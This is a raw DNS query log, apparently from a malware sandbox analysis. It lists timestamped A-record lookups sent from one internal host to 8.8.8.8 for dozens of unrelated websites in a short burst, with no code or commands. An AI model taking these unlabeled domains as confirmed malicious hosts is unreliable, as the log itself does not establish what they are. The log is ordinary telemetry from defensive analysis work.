                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.745482922 CEST192.168.2.48.8.8.80x83d9Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.749897003 CEST192.168.2.48.8.8.80x4f5cStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.759481907 CEST192.168.2.48.8.8.80x7718Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.764276028 CEST192.168.2.48.8.8.80xa224Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.205394030 CEST192.168.2.48.8.8.80x3dcbStandard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.205651999 CEST192.168.2.48.8.8.80x237eStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.206110954 CEST192.168.2.48.8.8.80x98c2Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.389905930 CEST192.168.2.48.8.8.80x3717Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.394669056 CEST192.168.2.48.8.8.80x8527Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.416495085 CEST192.168.2.48.8.8.80x336eStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.791847944 CEST192.168.2.48.8.8.80x3bccStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.847634077 CEST192.168.2.48.8.8.80xee6dStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.852576017 CEST192.168.2.48.8.8.80x2578Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.857877970 CEST192.168.2.48.8.8.80xd5c7Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.871011019 CEST192.168.2.48.8.8.80x6d07Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.414714098 CEST192.168.2.48.8.8.80x5f95Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.420197010 CEST192.168.2.48.8.8.80xc432Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.425966978 CEST192.168.2.48.8.8.80x1c2eStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.640913963 CEST192.168.2.48.8.8.80x87b2Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.825658083 CEST192.168.2.48.8.8.80xc4fbStandard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.833260059 CEST192.168.2.48.8.8.80x306fStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.835041046 CEST192.168.2.48.8.8.80x3bccStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.953864098 CEST192.168.2.48.8.8.80x206fStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.412230015 CEST192.168.2.48.8.8.80x1c2eStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.469949961 CEST192.168.2.48.8.8.80xbff8Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.470141888 CEST192.168.2.48.8.8.80x56ceStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.473480940 CEST192.168.2.48.8.8.80xb244Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.556231022 CEST192.168.2.48.8.8.80xc573Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.556977987 CEST192.168.2.48.8.8.80xd607Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.557724953 CEST192.168.2.48.8.8.80xd911Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.559029102 CEST192.168.2.48.8.8.80x140dStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.577620983 CEST192.168.2.48.8.8.80x9f61Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.855173111 CEST192.168.2.48.8.8.80x5085Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.907277107 CEST192.168.2.48.8.8.80xb137Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.148999929 CEST192.168.2.48.8.8.80xb824Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.190422058 CEST192.168.2.48.8.8.80xd0e1Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.534790993 CEST192.168.2.48.8.8.80xb716Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.535085917 CEST192.168.2.48.8.8.80x7c78Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.553164959 CEST192.168.2.48.8.8.80xd911Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.557466984 CEST192.168.2.48.8.8.80xf7e1Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.700314999 CEST192.168.2.48.8.8.80x9404Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.849353075 CEST192.168.2.48.8.8.80x9dadStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.850807905 CEST192.168.2.48.8.8.80x5085Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.255281925 CEST192.168.2.48.8.8.80xa8a6Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.266695976 CEST192.168.2.48.8.8.80xb3b4Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.267144918 CEST192.168.2.48.8.8.80xcc91Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.281023979 CEST192.168.2.48.8.8.80x2ca5Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.406594992 CEST192.168.2.48.8.8.80xd197Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.409123898 CEST192.168.2.48.8.8.80x81f1Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.411154032 CEST192.168.2.48.8.8.80x56afStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.413822889 CEST192.168.2.48.8.8.80x7322Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.419370890 CEST192.168.2.48.8.8.80x7469Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.428440094 CEST192.168.2.48.8.8.80x2b4cStandard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.430600882 CEST192.168.2.48.8.8.80x41f6Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.434398890 CEST192.168.2.48.8.8.80x40dfStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.436140060 CEST192.168.2.48.8.8.80x9853Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.436989069 CEST192.168.2.48.8.8.80xeb88Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.512923002 CEST192.168.2.48.8.8.80xb716Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.753113031 CEST192.168.2.48.8.8.80xf069Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.755136013 CEST192.168.2.48.8.8.80xcddaStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.762758017 CEST192.168.2.48.8.8.80x9906Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.871764898 CEST192.168.2.48.8.8.80xbfccStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.912467957 CEST192.168.2.48.8.8.80xe982Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.015135050 CEST192.168.2.48.8.8.80x6db7Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.029670954 CEST192.168.2.48.8.8.80x2472Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.046806097 CEST192.168.2.48.8.8.80x50aeStandard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.131759882 CEST192.168.2.48.8.8.80x7862Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.356023073 CEST192.168.2.48.8.8.80xcdf1Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.398885012 CEST192.168.2.48.8.8.80xaab7Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.400434017 CEST192.168.2.48.8.8.80x5377Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.403139114 CEST192.168.2.48.8.8.80x31aaStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.403904915 CEST192.168.2.48.8.8.80x30d6Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.404582977 CEST192.168.2.48.8.8.80x9638Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.416806936 CEST192.168.2.48.8.8.80x56afStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.429028988 CEST192.168.2.48.8.8.80x2decStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.646727085 CEST192.168.2.48.8.8.80xf44fStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.652808905 CEST192.168.2.48.8.8.80xcfdaStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.655611992 CEST192.168.2.48.8.8.80x7250Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.763242960 CEST192.168.2.48.8.8.80xe587Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.825145960 CEST192.168.2.48.8.8.80x5a0fStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.826816082 CEST192.168.2.48.8.8.80x746dStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.196708918 CEST192.168.2.48.8.8.80xd1a2Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.306217909 CEST192.168.2.48.8.8.80xf962Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.307692051 CEST192.168.2.48.8.8.80x294fStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.310530901 CEST192.168.2.48.8.8.80x6d3cStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.678936958 CEST192.168.2.48.8.8.80xa290Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.679392099 CEST192.168.2.48.8.8.80xc648Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.684034109 CEST192.168.2.48.8.8.80xc43dStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.807022095 CEST192.168.2.48.8.8.80x7cc0Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.807192087 CEST192.168.2.48.8.8.80x5877Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.810483932 CEST192.168.2.48.8.8.80x8897Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.812730074 CEST192.168.2.48.8.8.80x1df0Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.826309919 CEST192.168.2.48.8.8.80x8e86Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.836118937 CEST192.168.2.48.8.8.80x3f5bStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.130033016 CEST192.168.2.48.8.8.80xb375Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.175688982 CEST192.168.2.48.8.8.80x6578Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.177341938 CEST192.168.2.48.8.8.80xbf04Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.201064110 CEST192.168.2.48.8.8.80x8975Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.471884012 CEST192.168.2.48.8.8.80x5fbcStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.767762899 CEST192.168.2.48.8.8.80x1c0fStandard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.770875931 CEST192.168.2.48.8.8.80xb3cbStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.041320086 CEST192.168.2.48.8.8.80x618eStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.042938948 CEST192.168.2.48.8.8.80x1c95Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.092423916 CEST192.168.2.48.8.8.80x9d26Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.096146107 CEST192.168.2.48.8.8.80x2f23Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.096524000 CEST192.168.2.48.8.8.80x1a8Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.216453075 CEST192.168.2.48.8.8.80xada8Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.236558914 CEST192.168.2.48.8.8.80x6c89Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.316395044 CEST192.168.2.48.8.8.80x5b1fStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.689132929 CEST192.168.2.48.8.8.80xf456Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.690620899 CEST192.168.2.48.8.8.80x587bStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.697983027 CEST192.168.2.48.8.8.80xcd6aStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.768647909 CEST192.168.2.48.8.8.80xe981Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.893033981 CEST192.168.2.48.8.8.80x24beStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.898009062 CEST192.168.2.48.8.8.80x1d2Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.362225056 CEST192.168.2.48.8.8.80xb0e3Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.370372057 CEST192.168.2.48.8.8.80x8c67Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.373506069 CEST192.168.2.48.8.8.80x1edcStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.524203062 CEST192.168.2.48.8.8.80x2be3Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.530612946 CEST192.168.2.48.8.8.80x35efStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.915939093 CEST192.168.2.48.8.8.80x9f2fStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.919857979 CEST192.168.2.48.8.8.80x3c5eStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.922784090 CEST192.168.2.48.8.8.80x89eStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.347522020 CEST192.168.2.48.8.8.80xd6efStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.349244118 CEST192.168.2.48.8.8.80x9d5aStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.924647093 CEST192.168.2.48.8.8.80x95e1Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.255224943 CEST192.168.2.48.8.8.80x19dbStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.350847960 CEST192.168.2.48.8.8.80xd6efStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.563172102 CEST192.168.2.48.8.8.80x3c0cStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.599436998 CEST192.168.2.48.8.8.80x1abeStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.015875101 CEST192.168.2.48.8.8.80x8d16Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.019680023 CEST192.168.2.48.8.8.80x3abfStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.554442883 CEST192.168.2.48.8.8.80x3c0cStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.735315084 CEST192.168.2.48.8.8.80x4ed2Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:42.285469055 CEST192.168.2.48.8.8.80x24f4Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:42.532306910 CEST192.168.2.48.8.8.80xf580Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.262415886 CEST192.168.2.48.8.8.80x650Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.554898977 CEST192.168.2.48.8.8.80xddb3Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.918456078 CEST192.168.2.48.8.8.80x4610Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:45.579219103 CEST192.168.2.48.8.8.80xfbe9Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:46.154891014 CEST192.168.2.48.8.8.80x3595Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:46.474087954 CEST192.168.2.48.8.8.80xca3bStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:46.659296989 CEST192.168.2.48.8.8.80x67b1Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:48.120369911 CEST192.168.2.48.8.8.80x2047Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:48.941252947 CEST192.168.2.48.8.8.80xcda7Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.235826015 CEST192.168.2.48.8.8.80x4a45Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.491508007 CEST192.168.2.48.8.8.80xf50Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:50.522039890 CEST192.168.2.48.8.8.80x89b9Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:51.597552061 CEST192.168.2.48.8.8.80x35acStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:51.622966051 CEST192.168.2.48.8.8.80xdac3Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.042383909 CEST192.168.2.48.8.8.80xe6e9Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.046005011 CEST192.168.2.48.8.8.80xdc97Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.174666882 CEST192.168.2.48.8.8.80x2650Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.749145031 CEST192.168.2.48.8.8.80xe71aStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.763540030 CEST192.168.2.48.8.8.80xaa8cStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.698975086 CEST192.168.2.48.8.8.80x28a4Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.713828087 CEST192.168.2.48.8.8.80xf126Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.718985081 CEST192.168.2.48.8.8.80xf702Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.251391888 CEST192.168.2.48.8.8.80xc36Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.251555920 CEST192.168.2.48.8.8.80x7487Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.472784042 CEST192.168.2.48.8.8.80xa102Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.645620108 CEST192.168.2.48.8.8.80xd4dbStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.647562027 CEST192.168.2.48.8.8.80xc5c5Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.930495024 CEST192.168.2.48.8.8.80xaaebStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.998882055 CEST192.168.2.48.8.8.80xc896Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.118295908 CEST192.168.2.48.8.8.80xd6f5Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.427056074 CEST192.168.2.48.8.8.80x3710Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.478620052 CEST192.168.2.48.8.8.80xd8ffStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.482004881 CEST192.168.2.48.8.8.80xb5b1Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.850200891 CEST192.168.2.48.8.8.80x255aStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
